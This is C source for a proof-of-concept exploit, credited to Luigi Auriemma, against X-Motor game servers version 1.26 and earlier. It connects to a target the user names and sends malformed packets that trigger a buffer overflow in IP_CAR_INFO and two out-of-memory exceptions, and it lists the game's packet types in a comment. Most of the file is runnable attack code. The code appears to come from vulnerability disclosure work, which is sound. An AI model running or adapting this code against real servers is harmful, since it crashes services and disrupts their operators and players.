/*
  by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
    #define stricmp strcasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        63328
#define BUFFSZ      0xffff



int tcp_sock(struct sockaddr_in *peer);
int xmotor_send(int sd, int type, u8 *data, int len);
int xmotor_recv(int sd, int *type, u8 *data);
int putcc(u8 *data, int chr, int len);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            bug;
    u16     port    = PORT;
    u8      *buff,
            *host;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "X-Motor <= 1.26 buffer-overflow and exceptions "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug> <host> [port(%hu)]>\n"
            "\n"
            "Bugs:\n"
            " 1 = buffer-overflow in IP_CAR_INFO\n"
            " 2 = NO_MEMORY exception in IP_PHYSICS_PROFILE_PATTERN\n"
            " 3 = NO_MEMORY exception in IP_REPLACED_TEXTURE_PATTERN\n"
            "\n", argv[0], port);
        exit(1);
    }

    bug = atoi(argv[1]);
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

        // type length  description
        // 0x36         IP_QUERY_HOST_INFO
        // 0x38         CLIENT_PRESENTS
        // 0x01
        // 0x03
        // 0x0a         IP_CLIENT_DISCONNECT
        // 0x3d 0x150   IP_PHYSICS_PROFILE_QUERY_FROM_SERVER
        // 0x44 4       IP_LAP_TIME
        // 0x48 0x28    IP_RACE_STATISTICS
        // 0x39 0x150   IP_PHYSICS_PROFILE_PATTERN
        // 0x21 0x41c   IP_PHYSICS_PROFILE_PACKET
        // 0x4b 0x150   IP_REPLACED_TEXTURE_PATTERN
        // 0x4e 0x41c   IP_REPLACED_TEXTURE_PACKET
        // 0x12 0xd0    IP_LOCAL_HANDLING_MAP
        // 0x0c 0x1208  IP_CAR_INFO
        // 0x2d         IP_RESET_INFO
        // 0x0f         IP_CLIENT_CONNECTED
        // 0x32
        // 0x24
        // 0x14 0x24
        // 0x15 8
        // 0x1f 0x48    IP_CAR_SETTING
        // 0x34
        // 0x35

    sd = tcp_sock(&peer);

    printf("- send malformed packet\n");
    memset(buff, 0, BUFFSZ);
    if(bug == 1) {
        putcc(buff, 'a', 0x200);
        if(xmotor_send(sd, 0x0c, buff, 0x1208) < 0) goto quit;
    } else if(bug == 2) {
        buff[0x150 - 1] = 0;  // <= 0x0f
        putxx(buff + 0x104, -1, 32);    // heap allocation
        if(xmotor_send(sd, 0x39, buff, 0x150) < 0) goto quit;
    } else if(bug == 3) {
        buff[0x150 - 1] = 0;  // <= 0x0f
        putxx(buff + 0x104, -1, 32);    // heap allocation
        if(xmotor_send(sd, 0x4b, buff, 0x150) < 0) goto quit;
    } else {
        printf("\nError: invalid bug selection (%d)\n", bug);
        exit(1);
    }

    close(sd);
    printf("\n- check the server manually for verifying if it's vulnerable or not\n");
    return(0);
quit:
    printf("\nError: connection interrupted or something else\n");
    exit(1);
    return(0);
}



int tcp_sock(struct sockaddr_in *peer) {
    struct  linger  ling = {1,1};
    int     sd;

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
      < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
    return(sd);
}



int tcp_recv(int sd, u8 *buff, int len) {
    int     i,
            t;

    for(i = 0; i < len; i += t) {
        if(timeout(sd, 10) < 0) return(-1);
        t = recv(sd, buff + i, len - i, 0);
        if(t <= 0) return(-1);
    }
    return(len);
}



int xmotor_send(int sd, int type, u8 *data, int len) {
    u8      tmp[1 + 2];

    if(len > 0xffff) {
        printf("\nError: data too big (%d)\n", len);
        exit(1);
    }
    tmp[0] = type;
    tmp[1] = len;
    tmp[2] = len >> 8;
    if(send(sd, tmp,  3,   0) != 3)   return(-1);
    if(send(sd, data, len, 0) != len) return(-1);
    return(0);
}



int xmotor_recv(int sd, int *type, u8 *data) {
    int     len;
    u8      tmp[1 + 2];

    if(tcp_recv(sd, tmp, 3) < 0) return(-1);
    *type = tmp[0];
    len   = tmp[1] | (tmp[2] << 8);
    if(tcp_recv(sd, data, len) < 0) return(-1);
    return(len);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3));
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


